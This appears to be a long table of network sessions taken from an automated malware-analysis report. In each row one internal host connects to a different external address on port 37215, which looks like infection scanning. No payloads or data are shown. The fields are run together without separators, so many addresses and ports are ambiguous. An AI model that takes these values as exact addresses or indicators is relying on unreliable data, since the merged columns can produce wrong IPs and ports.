                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8672192.168.2.1555532157.91.104.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8673192.168.2.1557126197.208.236.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8674192.168.2.155595041.200.239.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8675192.168.2.1540248197.219.172.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8676192.168.2.1537574197.86.63.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8677192.168.2.1549004157.77.7.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8678192.168.2.153463041.49.81.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8679192.168.2.153428841.112.136.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8680192.168.2.1539726157.188.64.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8681192.168.2.1544758197.158.81.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8682192.168.2.155558841.17.109.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8683192.168.2.1538690197.120.168.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8684192.168.2.155699041.60.110.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8685192.168.2.1542270197.177.29.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8686192.168.2.1534972197.59.184.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8687192.168.2.1552180157.107.1.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8688192.168.2.1547116197.214.32.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8689192.168.2.1546524157.38.44.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8690192.168.2.1555704157.91.110.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8691192.168.2.1546702197.200.108.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8692192.168.2.1536616157.181.96.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8693192.168.2.155751441.46.160.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8694192.168.2.1539060157.141.90.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8695192.168.2.155169441.28.210.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8696192.168.2.155989078.95.89.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8697192.168.2.1553098197.58.63.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8698192.168.2.1551340198.32.95.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8699192.168.2.155593466.253.45.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8700192.168.2.1560110197.111.252.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8701192.168.2.1557768157.158.211.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8702192.168.2.1549878197.144.238.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8703192.168.2.1544476197.13.230.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8704192.168.2.1537654197.21.55.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8705192.168.2.154252241.199.207.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8706192.168.2.1538602157.218.98.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8707192.168.2.1544010197.160.144.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8708192.168.2.1534020157.93.179.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8709192.168.2.1534016197.105.5.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8710192.168.2.1555380197.113.156.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8711192.168.2.153913641.69.232.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8712192.168.2.1543134197.239.26.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8713192.168.2.1536540197.114.164.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8714192.168.2.1536088197.246.143.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8715192.168.2.155039448.154.129.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8716192.168.2.154612241.251.176.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8717192.168.2.155447441.193.224.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8718192.168.2.1537402157.118.108.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8719192.168.2.154291641.228.99.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8720192.168.2.155354041.177.201.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8721192.168.2.1552310157.98.90.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8722192.168.2.154273441.253.244.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8723192.168.2.1557966197.212.248.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8724192.168.2.1553828202.67.93.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8725192.168.2.1541802157.250.115.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8726192.168.2.1534222197.173.200.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8727192.168.2.1537658197.154.138.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8728192.168.2.1538452197.143.108.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8729192.168.2.153768841.65.42.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8730192.168.2.1532816197.42.216.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8731192.168.2.1538550102.96.236.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8732192.168.2.1553138197.149.102.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8733192.168.2.1535228197.14.236.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8734192.168.2.155727248.11.105.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8735192.168.2.154521441.48.193.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8736192.168.2.155491889.129.19.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8737192.168.2.1545722197.158.80.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8738192.168.2.154313641.253.176.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8739192.168.2.1545360157.163.78.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8740192.168.2.1534760197.70.207.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8741192.168.2.1536270197.168.66.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8742192.168.2.154968441.172.239.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8743192.168.2.154960841.196.246.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8744192.168.2.153712441.131.60.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8745192.168.2.1536260197.74.147.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8746192.168.2.1559606197.78.124.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8747192.168.2.1536554107.124.234.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8748192.168.2.1542710157.209.14.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8749192.168.2.1554294197.123.160.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8750192.168.2.1547142197.228.241.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8751192.168.2.153699441.117.118.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8752192.168.2.1541964144.159.55.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8753192.168.2.1556660197.236.192.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8754192.168.2.1553234197.87.108.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8755192.168.2.1558252157.15.89.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8756192.168.2.1548272197.248.178.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8757192.168.2.154628041.3.247.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8758192.168.2.1552620146.153.42.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8759192.168.2.154210441.50.197.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8760192.168.2.1549402201.1.62.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8761192.168.2.155582041.133.110.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8762192.168.2.1560796121.219.201.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8763192.168.2.1558938157.102.25.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8764192.168.2.1549270197.103.158.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8765192.168.2.1535052197.72.83.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8766192.168.2.155614641.130.202.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8767192.168.2.155230293.169.214.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8768192.168.2.1543568197.147.247.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8769192.168.2.154533012.228.186.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8770192.168.2.1552104157.221.40.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8771192.168.2.1534988178.84.1.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8772192.168.2.154851441.113.111.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8773192.168.2.1554022157.246.141.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8774192.168.2.1544102157.6.121.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8775192.168.2.155653289.112.174.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8776192.168.2.1551102157.218.232.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8777192.168.2.1545502157.43.221.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8778192.168.2.1544912157.128.49.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8779192.168.2.1533200157.104.224.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8780192.168.2.153914452.227.55.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8781192.168.2.155907641.44.36.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8782192.168.2.154014441.249.23.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8783192.168.2.156005641.0.55.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8784192.168.2.1542626197.13.177.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8785192.168.2.1552970197.36.175.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8786192.168.2.155539641.152.95.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8787192.168.2.155373441.84.240.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8788192.168.2.153711241.24.130.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8789192.168.2.1548582197.125.60.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8790192.168.2.154204841.65.74.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8791192.168.2.1553938197.61.76.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8792192.168.2.1556036157.76.72.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8793192.168.2.1536040197.83.44.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8794192.168.2.155430441.127.49.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8795192.168.2.1545632197.189.22.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8796192.168.2.1545012157.140.40.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8797192.168.2.1541300217.237.237.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8798192.168.2.1560060197.84.180.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8799192.168.2.1536712112.86.218.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8800192.168.2.1553016126.191.12.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8801192.168.2.153827841.118.5.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8802192.168.2.1546128157.103.68.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8803192.168.2.1550280157.110.193.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8804192.168.2.1536808197.222.175.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8805192.168.2.155589841.2.135.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8806192.168.2.1546992148.115.42.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8807192.168.2.1538292211.31.206.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8808192.168.2.156052441.243.157.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8809192.168.2.1543250197.109.126.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8810192.168.2.1543476197.38.162.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8811192.168.2.1542554157.21.241.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8812192.168.2.1534522166.253.53.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8813192.168.2.1560868157.185.23.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8814192.168.2.154407041.15.161.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8815192.168.2.154930465.167.109.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8816192.168.2.1552494157.167.3.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8817192.168.2.154015241.130.137.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8818192.168.2.1544078197.176.47.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8819192.168.2.1541574197.12.230.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8820192.168.2.1537032126.104.135.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8821192.168.2.1547322197.160.127.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8822192.168.2.1560130197.234.225.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8823192.168.2.1557454197.118.61.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8824192.168.2.1558726166.217.171.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8825192.168.2.1544560145.12.115.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8826192.168.2.1555500179.59.192.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8827192.168.2.155231841.188.59.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8828192.168.2.1539468197.54.234.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8829192.168.2.154201441.249.4.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8830192.168.2.155383041.10.182.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8831192.168.2.154166041.30.132.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8832192.168.2.1558196169.221.30.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8833192.168.2.153866641.105.207.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8834192.168.2.1533966197.231.131.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8835192.168.2.1544466157.214.42.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8836192.168.2.1554972157.98.180.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8837192.168.2.1555546197.49.219.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8838192.168.2.1558624197.1.158.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8839192.168.2.155483899.195.209.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8840192.168.2.1551638197.228.15.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8841192.168.2.1554216157.98.253.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8842192.168.2.1552546157.23.215.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8843192.168.2.1558682157.99.37.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8844192.168.2.1538102157.73.20.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8845192.168.2.153940441.198.54.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8846192.168.2.1558120197.157.164.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8847192.168.2.1538152157.139.0.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8848192.168.2.1541128197.153.143.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8849192.168.2.155987641.194.240.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8850192.168.2.1536720197.94.100.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8851192.168.2.1540002197.135.136.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8852192.168.2.1539610157.44.195.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8853192.168.2.155828041.186.109.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8854192.168.2.1543118197.49.229.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8855192.168.2.1534802197.173.162.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8856192.168.2.1549994157.147.125.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8857192.168.2.1555022157.175.254.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8858192.168.2.155826441.56.30.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8859192.168.2.1548100198.147.128.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8860192.168.2.154781467.151.250.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8861192.168.2.155397049.57.99.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8862192.168.2.1545142157.105.169.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8863192.168.2.1549196126.42.235.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8864192.168.2.153402041.46.179.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8865192.168.2.1548872121.175.145.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8866192.168.2.154403241.94.126.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8867192.168.2.1537602172.6.82.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8868192.168.2.153676441.74.94.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8869192.168.2.1533958197.213.46.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8870192.168.2.1533078197.122.148.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8871192.168.2.1543488157.238.109.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8872192.168.2.1544966197.88.169.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8873192.168.2.154927641.60.110.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8874192.168.2.1536644157.12.191.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8875192.168.2.154429441.23.211.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8876192.168.2.15366309.236.227.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8877192.168.2.1557202186.46.11.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8878192.168.2.1560636197.128.31.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8879192.168.2.1549580157.124.113.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8880192.168.2.1556896157.181.97.1037215
                                                          TimestampBytes transferredDirectionData


